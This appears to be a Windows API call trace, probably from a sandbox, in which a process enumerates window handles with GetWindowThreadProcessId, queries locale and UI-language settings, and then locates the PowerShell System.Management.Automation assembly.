	[0867.402] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x17d0
	[0867.402] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1d28
	[0867.402] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xcb8
	[0867.402] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1190
	[0867.402] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x3a8
	[0867.402] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1bd0
	[0867.402] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1bfc
	[0867.402] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1a78
	[0867.402] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1b90
	[0867.403] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1b04
	[0867.403] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1b34
	[0867.403] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1b64
	[0867.403] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1bb0
	[0867.403] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1acc
	[0867.403] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1a2c
	[0867.403] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x19a8
	[0867.403] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1944
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x18c8
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x18ac
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x18ec
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1898
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xc98
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x153c
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1808
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x12a4
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1740
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x16c4
	[0867.404] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1820
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x16ac
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1858
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1664
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x10b4
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x10ac
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x10ec
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1068
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x17e0
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x102c
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x17a4
	[0867.405] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1050
	[0867.406] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1694
	[0867.406] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1770
	[0867.406] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1720
	[0867.406] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x165c
	[0867.406] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1578
	[0867.406] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x16c0
	[0867.406] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x161c
	[0867.406] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1638
	[0867.406] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x15c8
	[0867.406] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1554
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1674
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1520
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x14bc
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xf8c
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xe9c
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1434
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x14ec
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xfcc
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x12ac
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1484
	[0867.407] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x934
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xc0c
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xb08
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x948
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1178
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x13e0
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xcd0
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x13fc
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xdc8
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xc18
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xc2c
	[0867.408] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xa1c
	[0867.409] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1244
	[0867.409] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xdb0
	[0867.409] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1398
	[0867.409] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1358
	[0867.409] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1370
	[0867.409] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1340
	[0867.409] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x130c
	[0867.409] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x12c0
	[0867.409] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x12e4
	[0867.409] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1270
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1298
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x120c
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x122c
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x11c4
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x11b0
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1188
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1148
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1160
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x10fc
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xe34
	[0867.410] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xea4
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x514
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xe48
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xbc8
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xdf8
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x318
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xcac
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x8bc
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xf9c
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xf48
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xe40
	[0867.411] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xecc
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xeb8
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xe80
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xe98
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xe60
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xee4
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xf00
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xdf0
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xe1c
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xdd0
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xd94
	[0867.412] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xd74
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xd00
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xcd8
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xc84
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xca4
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xc64
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xc24
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xb84
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xbac
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x384
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xab8
	[0867.413] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x33c
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xa44
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xa64
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x8a8
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xaf0
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x88c
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xb04
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x910
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x230
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xac0
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xab4
	[0867.414] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xaac
	[0867.415] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x3d0
	[0867.415] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x978
	[0867.415] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xa7c
	[0867.415] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x59c
	[0867.415] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xa88
	[0867.415] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xa6c
	[0867.415] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xa68
	[0867.415] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x9f8
	[0867.415] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xa04
	[0867.415] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x924
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x8dc
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x7dc
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x768
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x764
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x820
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x810
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x794
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x83c
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x7ac
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xb44
	[0867.416] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x6bc
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0xb5c
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x838
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x4d0
	[0867.417] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x818
	[0867.418] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x5b8
	[0867.418] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x494
	[0867.418] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x1ec
	[0867.418] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x440
	[0867.418] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x7e8
	[0867.418] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x730
	[0867.418] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x2c8
	[0867.418] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x31c
	[0867.418] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x330
	[0867.418] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x128
	[0867.419] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x5c8
	[0867.419] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x6f8
	[0867.419] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcddc0 | out: lpdwProcessId=0xcddc0) returned 0x358
	[0867.423] WerSetFlags () returned 0x0
	[0868.069] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0868.069] CoTaskMemFree (pv=0x0) 
	[0868.070] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xce128, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xce120 | out: pulNumLanguages=0xce128, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xce120) returned 1
	[0868.071] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xce128, pwszLanguagesBuffer=0x2d08fd0, pcchLanguagesBuffer=0xce120 | out: pulNumLanguages=0xce128, pwszLanguagesBuffer=0x2d08fd0, pcchLanguagesBuffer=0xce120) returned 1
	[0868.076] CoTaskMemAlloc (cb=0x24) returned 0x1ec320
	[0868.076] GetUserDefaultLocaleName (in: lpLocaleName=0x1ec320, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0868.076] CoTaskMemFree (pv=0x1ec320) 
	[0868.696] CoTaskMemAlloc (cb=0x104) returned 0x1a4520
	[0868.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a4520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.697] CoTaskMemFree (pv=0x1a4520) 
	[0868.699] CoTaskMemAlloc (cb=0x104) returned 0x1a4520
	[0868.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a4520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.699] CoTaskMemFree (pv=0x1a4520) 
	[0868.701] CoTaskMemAlloc (cb=0x104) returned 0x1a4520
	[0868.701] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a4520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.701] CoTaskMemFree (pv=0x1a4520) 
	[0868.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
